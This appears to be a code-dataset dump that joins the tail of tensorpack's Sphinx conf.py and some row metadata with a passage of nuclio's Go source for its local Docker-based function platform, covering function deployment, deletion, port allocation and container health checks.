intersphinx_mapping = {'python': ('https://docs.python.org/3.6', None)}
# -------------------------
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# to support markdown
from recommonmark.parser import CommonMarkParser
source_parsers = {
'.md': CommonMarkParser,
}
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
source_suffix = ['.rst', '.md']
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'tensorpack'
copyright = u'2015 - 2018, Yuxin Wu, et al.'
author = u'Yuxin Wu, et al.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = tensorpack.__version__
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['build', 'README.md']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# 'tensorpack.' prefix was removed by js
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['tensorpack.']
# If true, keep warnings as "system message" paragraphs in the built documents.
keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {}
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_domain_indices = True
# If false, no index is generated.
html_use_index = True
# If true, the index is split into individual pages for each letter.
html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# avoid li fonts being larger
# TODO but li indices fonts are still larger
html_compact_lists = False
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'tensorpackdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'tensorpack.tex', u'tensorpack documentation',
author, 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'tensorpack', u'tensorpack documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'tensorpack', u'tensorpack documentation',
author, 'tensorpack', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
suppress_warnings = ['image.nonlocal_uri']
#autodoc_member_order = 'bysource'
def process_signature(app, what, name, obj, options, signature,
return_annotation):
if signature:
# replace Mock function names
signature = re.sub('<Mock name=\'([^\']+)\'.*>', '\g<1>', signature)
signature = re.sub('tensorflow', 'tf', signature)
# add scope name to layer signatures:
if hasattr(obj, 'use_scope') and hasattr(obj, 'symbolic_function'):
if obj.use_scope:
signature = signature[0] + 'scope_name, ' + signature[1:]
elif obj.use_scope is None:
signature = signature[0] + '[scope_name,] ' + signature[1:]
# signature: arg list
return signature, return_annotation
_DEPRECATED_NAMES = set([
# deprecated stuff:
'TryResumeTraining',
'QueueInputTrainer',
'SimplePredictBuilder',
'LMDBDataPoint',
'TFRecordData',
'dump_dataflow_to_lmdb',
'dump_dataflow_to_tfrecord',
# renamed stuff:
'DumpTensor',
'DumpParamAsImage',
'StagingInputWrapper',
'PeriodicRunHooks',
'get_nr_gpu',
# deprecated or renamed symbolic code
'ImageSample',
'Deconv2D',
'get_scalar_var', 'psnr',
'prediction_incorrect', 'huber_loss',
# internal only
'apply_default_prefetch',
'average_grads',
'aggregate_grads',
'allreduce_grads',
'PrefetchOnGPUs',
])
def autodoc_skip_member(app, what, name, obj, skip, options):
# we hide something deliberately
if getattr(obj, '__HIDE_SPHINX_DOC__', False):
return True
if name == '__init__':
if obj.__doc__ and skip:
# include_init_with_doc doesn't work well for decorated init
# https://github.com/sphinx-doc/sphinx/issues/4258
return False
# Hide some names that are deprecated or not intended to be used
if name in _DEPRECATED_NAMES:
return True
if name in ['get_data', 'size', 'reset_state']:
# skip these methods with empty docstring
if not obj.__doc__ and inspect.isfunction(obj):
# https://stackoverflow.com/questions/3589311/get-defining-class-of-unbound-method-object-in-python-3
cls = getattr(inspect.getmodule(obj),
obj.__qualname__.split('.<locals>', 1)[0].rsplit('.', 1)[0])
if issubclass(cls, tensorpack.DataFlow):
return True
return None
def url_resolver(url):
if '.html' not in url:
return "https://github.com/tensorpack/tensorpack/blob/master/" + url
else:
if ON_RTD:
return "http://tensorpack.readthedocs.io/" + url
else:
return '/' + url
def setup(app):
from recommonmark.transform import AutoStructify
app.connect('autodoc-process-signature', process_signature)
app.connect('autodoc-skip-member', autodoc_skip_member)
app.add_config_value(
'recommonmark_config',
{'url_resolver': url_resolver,
'auto_toc_tree_section': 'Contents',
'enable_math': True,
'enable_inline_math': True,
'enable_eval_rst': True
}, True)
app.add_transform(AutoStructify)
|
[] |
[] |
[
"DOC_BUILDING",
"READTHEDOCS"
] |
[]
|
["DOC_BUILDING", "READTHEDOCS"]
|
python
| 2 | 0 | |
pkg/platform/local/platform.go
|
/*
Copyright 2017 The Nuclio Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package local
import (
"bytes"
"context"
"encoding/json"
"fmt"
"io/ioutil"
"net"
"os"
"path"
"strconv"
"time"
"github.com/nuclio/nuclio/pkg/cmdrunner"
"github.com/nuclio/nuclio/pkg/common"
"github.com/nuclio/nuclio/pkg/containerimagebuilderpusher"
"github.com/nuclio/nuclio/pkg/dockerclient"
"github.com/nuclio/nuclio/pkg/errors"
"github.com/nuclio/nuclio/pkg/functionconfig"
"github.com/nuclio/nuclio/pkg/platform"
"github.com/nuclio/nuclio/pkg/platform/abstract"
"github.com/nuclio/nuclio/pkg/processor"
"github.com/nuclio/nuclio/pkg/processor/config"
"github.com/nuclio/logger"
"github.com/nuclio/nuclio-sdk-go"
"github.com/nuclio/zap"
"golang.org/x/sync/errgroup"
)
type Platform struct {
*abstract.Platform
cmdRunner cmdrunner.CmdRunner
dockerClient dockerclient.Client
localStore *store
checkFunctionContainersHealthiness bool
functionContainersHealthinessTimeout time.Duration
functionContainersHealthinessInterval time.Duration
}
const Mib = 1048576
// NewPlatform instantiates a new local platform
func NewPlatform(parentLogger logger.Logger) (*Platform, error) {
newPlatform := &Platform{}
// create base
newAbstractPlatform, err := abstract.NewPlatform(parentLogger, newPlatform)
if err != nil {
return nil, errors.Wrap(err, "Failed to create abstract platform")
}
// init platform
newPlatform.Platform = newAbstractPlatform
// function containers healthiness check is disabled by default
newPlatform.checkFunctionContainersHealthiness = common.GetEnvOrDefaultBool("NUCLIO_CHECK_FUNCTION_CONTAINERS_HEALTHINESS", false)
newPlatform.functionContainersHealthinessTimeout = time.Second * 5
newPlatform.functionContainersHealthinessInterval = time.Second * 30
// create a command runner
if newPlatform.cmdRunner, err = cmdrunner.NewShellRunner(newPlatform.Logger); err != nil {
return nil, errors.Wrap(err, "Failed to create command runner")
}
if newPlatform.ContainerBuilder, err = containerimagebuilderpusher.NewDocker(newPlatform.Logger); err != nil {
return nil, errors.Wrap(err, "Failed to create containerimagebuilderpusher")
}
// create a docker client
if newPlatform.dockerClient, err = dockerclient.NewShellClient(newPlatform.Logger, nil); err != nil {
return nil, errors.Wrap(err, "Failed to create docker client")
}
// create a local store for configs and stuff
if newPlatform.localStore, err = newStore(parentLogger, newPlatform, newPlatform.dockerClient); err != nil {
return nil, errors.Wrap(err, "Failed to create local store")
}
// ignite goroutine to check function container healthiness
if newPlatform.checkFunctionContainersHealthiness {
newPlatform.Logger.DebugWith("Igniting container healthiness validator")
go func(newPlatform *Platform) {
uptimeTicker := time.NewTicker(newPlatform.functionContainersHealthinessInterval)
for range uptimeTicker.C {
newPlatform.ValidateFunctionContainersHealthiness()
}
}(newPlatform)
}
return newPlatform, nil
}
// CreateFunction will simply run a docker image
func (p *Platform) CreateFunction(createFunctionOptions *platform.CreateFunctionOptions) (*platform.CreateFunctionResult, error) {
var previousHTTPPort int
var err error
var existingFunctionConfig *functionconfig.ConfigWithStatus
// wrap logger
logStream, err := abstract.NewLogStream("deployer", nucliozap.InfoLevel, createFunctionOptions.Logger)
if err != nil {
return nil, errors.Wrap(err, "Failed to create log stream")
}
// save the log stream for the name
p.DeployLogStreams[createFunctionOptions.FunctionConfig.Meta.GetUniqueID()] = logStream
// replace logger
createFunctionOptions.Logger = logStream.GetLogger()
if err := p.ValidateCreateFunctionOptions(createFunctionOptions); err != nil {
return nil, errors.Wrap(err, "Create function options validation failed")
}
// local currently doesn't support registries of any kind. remove push / run registry
createFunctionOptions.FunctionConfig.Spec.RunRegistry = ""
createFunctionOptions.FunctionConfig.Spec.Build.Registry = ""
// it's possible to pass a function without specifying any meta in the request, in that case skip getting existing function
if createFunctionOptions.FunctionConfig.Meta.Namespace != "" && createFunctionOptions.FunctionConfig.Meta.Name != "" {
existingFunctions, err := p.localStore.getFunctions(&createFunctionOptions.FunctionConfig.Meta)
if err != nil {
return nil, errors.Wrap(err, "Failed to get existing functions")
}
if len(existingFunctions) == 0 {
existingFunctionConfig = nil
} else {
// assume only one
existingFunction := existingFunctions[0]
// build function options
existingFunctionConfig = &functionconfig.ConfigWithStatus{
Config: *existingFunction.GetConfig(),
Status: *existingFunction.GetStatus(),
}
}
}
reportCreationError := func(creationError error) error {
createFunctionOptions.Logger.WarnWith("Create function failed, setting function status",
"err", creationError)
errorStack := bytes.Buffer{}
errors.PrintErrorStack(&errorStack, creationError, 20)
// cut messages that are too big
if errorStack.Len() >= 4*Mib {
errorStack.Truncate(4 * Mib)
}
// post logs and error
return p.localStore.createOrUpdateFunction(&functionconfig.ConfigWithStatus{
Config: createFunctionOptions.FunctionConfig,
Status: functionconfig.Status{
State: functionconfig.FunctionStateError,
Message: errorStack.String(),
},
})
}
onAfterConfigUpdated := func(updatedFunctionConfig *functionconfig.Config) error {
createFunctionOptions.Logger.DebugWith("Creating shadow function",
"name", createFunctionOptions.FunctionConfig.Meta.Name)
// create the function in the store
if err = p.localStore.createOrUpdateFunction(&functionconfig.ConfigWithStatus{
Config: createFunctionOptions.FunctionConfig,
Status: functionconfig.Status{
State: functionconfig.FunctionStateBuilding,
},
}); err != nil {
return errors.Wrap(err, "Failed to create function")
}
previousHTTPPort, err = p.deletePreviousContainers(createFunctionOptions)
if err != nil {
return errors.Wrap(err, "Failed to delete previous containers")
}
// indicate that the creation state has been updated. local platform has no "building" state yet
if createFunctionOptions.CreationStateUpdated != nil {
createFunctionOptions.CreationStateUpdated <- true
}
return nil
}
onAfterBuild := func(buildResult *platform.CreateFunctionBuildResult, buildErr error) (*platform.CreateFunctionResult, error) {
if buildErr != nil {
reportCreationError(buildErr) // nolint: errcheck
return nil, buildErr
}
createFunctionResult, deployErr := p.deployFunction(createFunctionOptions, previousHTTPPort)
if deployErr != nil {
reportCreationError(deployErr) // nolint: errcheck
return nil, deployErr
}
// update the function
if err = p.localStore.createOrUpdateFunction(&functionconfig.ConfigWithStatus{
Config: createFunctionOptions.FunctionConfig,
Status: functionconfig.Status{
HTTPPort: createFunctionResult.Port,
State: functionconfig.FunctionStateReady,
},
}); err != nil {
return nil, errors.Wrap(err, "Failed to update function with state")
}
return createFunctionResult, nil
}
// If needed, load any docker image from archive into docker
if createFunctionOptions.InputImageFile != "" {
p.Logger.InfoWith("Loading docker image from archive", "input", createFunctionOptions.InputImageFile)
err := p.dockerClient.Load(createFunctionOptions.InputImageFile)
if err != nil {
return nil, errors.Wrap(err, "Failed to load docker image from archive")
}
}
// wrap the deployer's deploy with the base HandleDeployFunction to provide lots of
// common functionality
return p.HandleDeployFunction(existingFunctionConfig, createFunctionOptions, onAfterConfigUpdated, onAfterBuild)
}
// GetFunctions will return deployed functions
func (p *Platform) GetFunctions(getFunctionsOptions *platform.GetFunctionsOptions) ([]platform.Function, error) {
var functions []platform.Function
// get project filter
projectName := common.StringToStringMap(getFunctionsOptions.Labels, "=")["nuclio.io/project-name"]
// get all the functions in the store. these functions represent both functions that are deployed
// and functions that failed to build
localStoreFunctions, err := p.localStore.getFunctions(&functionconfig.Meta{
Name: getFunctionsOptions.Name,
Namespace: getFunctionsOptions.Namespace,
})
if err != nil {
return nil, errors.Wrap(err, "Failed to read functions from local store")
}
// return a map of functions by name
for _, localStoreFunction := range localStoreFunctions {
// filter by project name
if projectName != "" && localStoreFunction.GetConfig().Meta.Labels["nuclio.io/project-name"] != projectName {
continue
}
// enrich with build logs
if deployLogStream, exists := p.DeployLogStreams[localStoreFunction.GetConfig().Meta.GetUniqueID()]; exists {
deployLogStream.ReadLogs(nil, &localStoreFunction.GetStatus().Logs)
}
functions = append(functions, localStoreFunction)
}
return functions, nil
}
// UpdateFunction will update a previously deployed function
func (p *Platform) UpdateFunction(updateFunctionOptions *platform.UpdateFunctionOptions) error {
return nil
}
// DeleteFunction will delete a previously deployed function
func (p *Platform) DeleteFunction(deleteFunctionOptions *platform.DeleteFunctionOptions) error {
// delete the function from the local store
err := p.localStore.deleteFunction(&deleteFunctionOptions.FunctionConfig.Meta)
if err != nil {
// propagate not found errors
if err == nuclio.ErrNotFound {
return err
}
p.Logger.WarnWith("Failed to delete function from local store", "err", err.Error())
}
getFunctionEventsOptions := &platform.FunctionEventMeta{
Labels: map[string]string{
"nuclio.io/function-name": deleteFunctionOptions.FunctionConfig.Meta.Name,
},
Namespace: deleteFunctionOptions.FunctionConfig.Meta.Namespace,
}
functionEvents, err := p.localStore.getFunctionEvents(getFunctionEventsOptions)
if err != nil {
return errors.Wrap(err, "Failed to get function events")
}
p.Logger.InfoWith("Got function events", "num", len(functionEvents))
errGroup, _ := errgroup.WithContext(context.TODO())
for _, functionEvent := range functionEvents {
errGroup.Go(func() error {
err = p.localStore.deleteFunctionEvent(&functionEvent.GetConfig().Meta)
if err != nil {
return errors.Wrap(err, "Failed to delete function event")
}
return nil
})
}
// wait for all errgroup goroutines
if err := errGroup.Wait(); err != nil {
return errors.Wrap(err, "Failed to delete function events")
}
getContainerOptions := &dockerclient.GetContainerOptions{
Labels: map[string]string{
"nuclio.io/platform": "local",
"nuclio.io/namespace": deleteFunctionOptions.FunctionConfig.Meta.Namespace,
"nuclio.io/function-name": deleteFunctionOptions.FunctionConfig.Meta.Name,
},
}
containersInfo, err := p.dockerClient.GetContainers(getContainerOptions)
if err != nil {
return errors.Wrap(err, "Failed to get containers")
}
if len(containersInfo) == 0 {
return nil
}
// iterate over contains and delete them. It's possible that under some weird circumstances
// there are a few instances of this function in the namespace
for _, containerInfo := range containersInfo {
if err := p.dockerClient.RemoveContainer(containerInfo.ID); err != nil {
return err
}
}
p.Logger.InfoWith("Function deleted", "name", deleteFunctionOptions.FunctionConfig.Meta.Name)
return nil
}
// GetHealthCheckMode returns the healthcheck mode the platform requires
func (p *Platform) GetHealthCheckMode() platform.HealthCheckMode {
// The internal client needs to perform the health check
return platform.HealthCheckModeInternalClient
}
// GetName returns the platform name
func (p *Platform) GetName() string {
return "local"
}
func (p *Platform) GetNodes() ([]platform.Node, error) {
// just create a single node
return []platform.Node{&node{}}, nil
}
// CreateProject will create a new project
func (p *Platform) CreateProject(createProjectOptions *platform.CreateProjectOptions) error {
return p.localStore.createOrUpdateProject(&createProjectOptions.ProjectConfig)
}
// UpdateProject will update an existing project
func (p *Platform) UpdateProject(updateProjectOptions *platform.UpdateProjectOptions) error {
return p.localStore.createOrUpdateProject(&updateProjectOptions.ProjectConfig)
}
// DeleteProject will delete an existing project
func (p *Platform) DeleteProject(deleteProjectOptions *platform.DeleteProjectOptions) error {
if err := p.Platform.ValidateDeleteProjectOptions(deleteProjectOptions); err != nil {
return errors.Wrap(err, "Delete project options validation failed")
}
return p.localStore.deleteProject(&deleteProjectOptions.Meta)
}
// GetProjects will list existing projects
func (p *Platform) GetProjects(getProjectsOptions *platform.GetProjectsOptions) ([]platform.Project, error) {
return p.localStore.getProjects(&getProjectsOptions.Meta)
}
// CreateFunctionEvent will create a new function event that can later be used as a template from
// which to invoke functions
func (p *Platform) CreateFunctionEvent(createFunctionEventOptions *platform.CreateFunctionEventOptions) error {
return p.localStore.createOrUpdateFunctionEvent(&createFunctionEventOptions.FunctionEventConfig)
}
// UpdateFunctionEvent will update a previously existing function event
func (p *Platform) UpdateFunctionEvent(updateFunctionEventOptions *platform.UpdateFunctionEventOptions) error {
return p.localStore.createOrUpdateFunctionEvent(&updateFunctionEventOptions.FunctionEventConfig)
}
// DeleteFunctionEvent will delete a previously existing function event
func (p *Platform) DeleteFunctionEvent(deleteFunctionEventOptions *platform.DeleteFunctionEventOptions) error {
return p.localStore.deleteFunctionEvent(&deleteFunctionEventOptions.Meta)
}
// GetFunctionEvents will list existing function events
func (p *Platform) GetFunctionEvents(getFunctionEventsOptions *platform.GetFunctionEventsOptions) ([]platform.FunctionEvent, error) {
return p.localStore.getFunctionEvents(&getFunctionEventsOptions.Meta)
}
// GetExternalIPAddresses returns the external IP addresses invocations will use, if "via" is set to "external-ip".
// These addresses are either set through SetExternalIPAddresses or automatically discovered
func (p *Platform) GetExternalIPAddresses() ([]string, error) {
// check if parent has addresses
externalIPAddress, err := p.Platform.GetExternalIPAddresses()
if err != nil {
return nil, errors.Wrap(err, "Failed to get external IP addresses from parent")
}
// if the parent has something, use that
if len(externalIPAddress) != 0 {
return externalIPAddress, nil
}
// If the testing environment variable is set - use that
if os.Getenv("NUCLIO_TEST_HOST") != "" {
return []string{os.Getenv("NUCLIO_TEST_HOST")}, nil
}
if common.RunningInContainer() {
return []string{"172.17.0.1"}, nil
}
// return an empty string to maintain backwards compatibility
return []string{""}, nil
}
// ResolveDefaultNamespace returns the proper default resource namespace, given the current default namespace
func (p *Platform) ResolveDefaultNamespace(defaultNamespace string) string {
// if no default namespace is chosen, use "nuclio"
if defaultNamespace == "@nuclio.selfNamespace" || defaultNamespace == "" {
return "nuclio"
}
return defaultNamespace
}
// GetNamespaces returns all the namespaces in the platform
func (p *Platform) GetNamespaces() ([]string, error) {
return []string{"nuclio"}, nil
}
func (p *Platform) GetDefaultInvokeIPAddresses() ([]string, error) {
return []string{"172.17.0.1"}, nil
}
func (p *Platform) getFreeLocalPort() (int, error) {
addr, err := net.ResolveTCPAddr("tcp", "127.0.0.1:0")
if err != nil {
return 0, err
}
l, err := net.ListenTCP("tcp", addr)
if err != nil {
return 0, err
}
defer l.Close() // nolint: errcheck
return l.Addr().(*net.TCPAddr).Port, nil
}
func (p *Platform) deployFunction(createFunctionOptions *platform.CreateFunctionOptions,
previousHTTPPort int) (*platform.CreateFunctionResult, error) {
// get function platform specific configuration
functionPlatformConfiguration, err := newFunctionPlatformConfiguration(&createFunctionOptions.FunctionConfig)
if err != nil {
return nil, errors.Wrap(err, "Failed to create function platform configuration")
}
// get function port - either from configuration, from the previous deployment or from a free port
functionHTTPPort, err := p.getFunctionHTTPPort(createFunctionOptions, previousHTTPPort)
if err != nil {
return nil, errors.Wrap(err, "Failed to get function HTTP port")
}
createFunctionOptions.Logger.DebugWith("Function port allocated",
"port", functionHTTPPort,
"previousHTTPPort", previousHTTPPort)
labels := map[string]string{
"nuclio.io/platform": "local",
"nuclio.io/namespace": createFunctionOptions.FunctionConfig.Meta.Namespace,
"nuclio.io/function-name": createFunctionOptions.FunctionConfig.Meta.Name,
"nuclio.io/function-spec": p.encodeFunctionSpec(&createFunctionOptions.FunctionConfig.Spec),
}
for labelName, labelValue := range createFunctionOptions.FunctionConfig.Meta.Labels {
labels[labelName] = labelValue
}
marshalledAnnotations := p.marshallAnnotations(createFunctionOptions.FunctionConfig.Meta.Annotations)
if marshalledAnnotations != nil {
labels["nuclio.io/annotations"] = string(marshalledAnnotations)
}
// create processor configuration at a temporary location unless user specified a configuration
localProcessorConfigPath, err := p.createProcessorConfig(createFunctionOptions)
if err != nil {
return nil, errors.Wrap(err, "Failed to create processor configuration")
}
// create volumes string[string] map for volumes
volumesMap := map[string]string{
localProcessorConfigPath: path.Join("/", "etc", "nuclio", "config", "processor", "processor.yaml"),
}
for _, volume := range createFunctionOptions.FunctionConfig.Spec.Volumes {
// only add hostpath volumes
if volume.Volume.HostPath != nil {
volumesMap[volume.Volume.HostPath.Path] = volume.VolumeMount.MountPath
}
}
envMap := map[string]string{}
for _, env := range createFunctionOptions.FunctionConfig.Spec.Env {
envMap[env.Name] = env.Value
}
// run the docker image
containerID, err := p.dockerClient.RunContainer(createFunctionOptions.FunctionConfig.Spec.Image, &dockerclient.RunOptions{
ContainerName: p.getContainerNameByCreateFunctionOptions(createFunctionOptions),
Ports: map[int]int{functionHTTPPort: 8080},
Env: envMap,
Labels: labels,
Volumes: volumesMap,
Network: functionPlatformConfiguration.Network,
})
if err != nil {
return nil, errors.Wrap(err, "Failed to run docker container")
}
p.Logger.InfoWith("Waiting for function to be ready", "timeout", createFunctionOptions.FunctionConfig.Spec.ReadinessTimeoutSeconds)
var readinessTimeout time.Duration
if createFunctionOptions.FunctionConfig.Spec.ReadinessTimeoutSeconds != 0 {
readinessTimeout = time.Duration(createFunctionOptions.FunctionConfig.Spec.ReadinessTimeoutSeconds) * time.Second
} else {
readinessTimeout = 60 * time.Second
}
if err = p.dockerClient.AwaitContainerHealth(containerID, &readinessTimeout); err != nil {
var errMessage string
// try to get error logs
containerLogs, getContainerLogsErr := p.dockerClient.GetContainerLogs(containerID)
if getContainerLogsErr == nil {
errMessage = fmt.Sprintf("Function wasn't ready in time. Logs:\n%s", containerLogs)
} else {
errMessage = fmt.Sprintf("Function wasn't ready in time (couldn't fetch logs: %s)", getContainerLogsErr.Error())
}
return nil, errors.Wrap(err, errMessage)
}
return &platform.CreateFunctionResult{
CreateFunctionBuildResult: platform.CreateFunctionBuildResult{
Image: createFunctionOptions.FunctionConfig.Spec.Image,
UpdatedFunctionConfig: createFunctionOptions.FunctionConfig,
},
Port: functionHTTPPort,
ContainerID: containerID,
}, nil
}
func (p *Platform) createProcessorConfig(createFunctionOptions *platform.CreateFunctionOptions) (string, error) {
configWriter, err := processorconfig.NewWriter()
if err != nil {
return "", errors.Wrap(err, "Failed to create processor configuration writer")
}
// must specify "/tmp" here so that it's available on docker for mac
processorConfigFile, err := ioutil.TempFile("/tmp", "processor-config-")
if err != nil {
return "", errors.Wrap(err, "Failed to create temporary processor config")
}
defer processorConfigFile.Close() // nolint: errcheck
if err = configWriter.Write(processorConfigFile, &processor.Configuration{
Config: createFunctionOptions.FunctionConfig,
}); err != nil {
return "", errors.Wrap(err, "Failed to write processor config")
}
p.Logger.DebugWith("Wrote processor configuration", "path", processorConfigFile.Name())
// read the file once for logging
processorConfigContents, err := ioutil.ReadFile(processorConfigFile.Name())
if err != nil {
return "", errors.Wrap(err, "Failed to read processor configuration file")
}
// log
p.Logger.DebugWith("Wrote processor configuration file", "contents", string(processorConfigContents))
return processorConfigFile.Name(), nil
}
func (p *Platform) encodeFunctionSpec(spec *functionconfig.Spec) string {
encodedFunctionSpec, _ := json.Marshal(spec)
return string(encodedFunctionSpec)
}
func (p *Platform) getFunctionHTTPPort(createFunctionOptions *platform.CreateFunctionOptions,
previousHTTPPort int) (int, error) {
// if the configuration specified an HTTP port - use that
if createFunctionOptions.FunctionConfig.Spec.GetHTTPPort() != 0 {
p.Logger.DebugWith("Configuration specified HTTP port",
"port",
createFunctionOptions.FunctionConfig.Spec.GetHTTPPort())
return createFunctionOptions.FunctionConfig.Spec.GetHTTPPort(), nil
}
// if there was a previous deployment and no configuration - use that
if previousHTTPPort != 0 {
return previousHTTPPort, nil
}
// get a free local port
freeLocalPort, err := p.getFreeLocalPort()
if err != nil {
return -1, errors.Wrap(err, "Failed to get free local port")
}
p.Logger.DebugWith("Found free local port", "port", freeLocalPort)
return freeLocalPort, nil
}
func (p *Platform) getContainerNameByCreateFunctionOptions(createFunctionOptions *platform.CreateFunctionOptions) string {
return fmt.Sprintf("%s-%s",
createFunctionOptions.FunctionConfig.Meta.Namespace,
createFunctionOptions.FunctionConfig.Meta.Name)
}
func (p *Platform) getContainerHTTPTriggerPort(container *dockerclient.Container) int {
ports := container.HostConfig.PortBindings["8080/tcp"]
if len(ports) == 0 {
return 0
}
httpPort, _ := strconv.Atoi(ports[0].HostPort)
return httpPort
}
func (p *Platform) marshallAnnotations(annotations map[string]string) []byte {
if annotations == nil {
return nil
}
marshalledAnnotations, err := json.Marshal(annotations)
if err != nil {
return nil
}
// convert to string and return address
return marshalledAnnotations
}
func (p *Platform) deletePreviousContainers(createFunctionOptions *platform.CreateFunctionOptions) (int, error) {
var previousHTTPPort int
createFunctionOptions.Logger.InfoWith("Cleaning up before deployment")
getContainerOptions := &dockerclient.GetContainerOptions{
Name: p.getContainerNameByCreateFunctionOptions(createFunctionOptions),
Stopped: true,
}
containers, err := p.dockerClient.GetContainers(getContainerOptions)
if err != nil {
return 0, errors.Wrap(err, "Failed to get function")
}
// if the function exists, delete it
if len(containers) > 0 {
createFunctionOptions.Logger.InfoWith("Function already exists, deleting")
// iterate over containers and delete
for _, container := range containers {
previousHTTPPort = p.getContainerHTTPTriggerPort(&container)
err = p.dockerClient.RemoveContainer(container.Name)
if err != nil {
return 0, errors.Wrap(err, "Failed to delete existing function")
}
}
}
return previousHTTPPort, nil
}
func (p *Platform) ValidateFunctionContainersHealthiness() {
namespaces, err := p.GetNamespaces()
if err != nil {
p.Logger.WarnWith("Cannot not get namespaces", "err", err)
return
}
var unhealthyFunctions []*functionconfig.Config
var functionsFailedToMarkUnhealthy []*functionconfig.Config
for _, namespace := range namespaces {
// get functions for that namespace
functions, err := p.GetFunctions(&platform.GetFunctionsOptions{
Namespace: namespace,
})
if err != nil {
p.Logger.WarnWith("Cannot get functions to validate",
"namespace", namespace,
"err", err)
continue
}
// For each function, we will check if its container is healthy
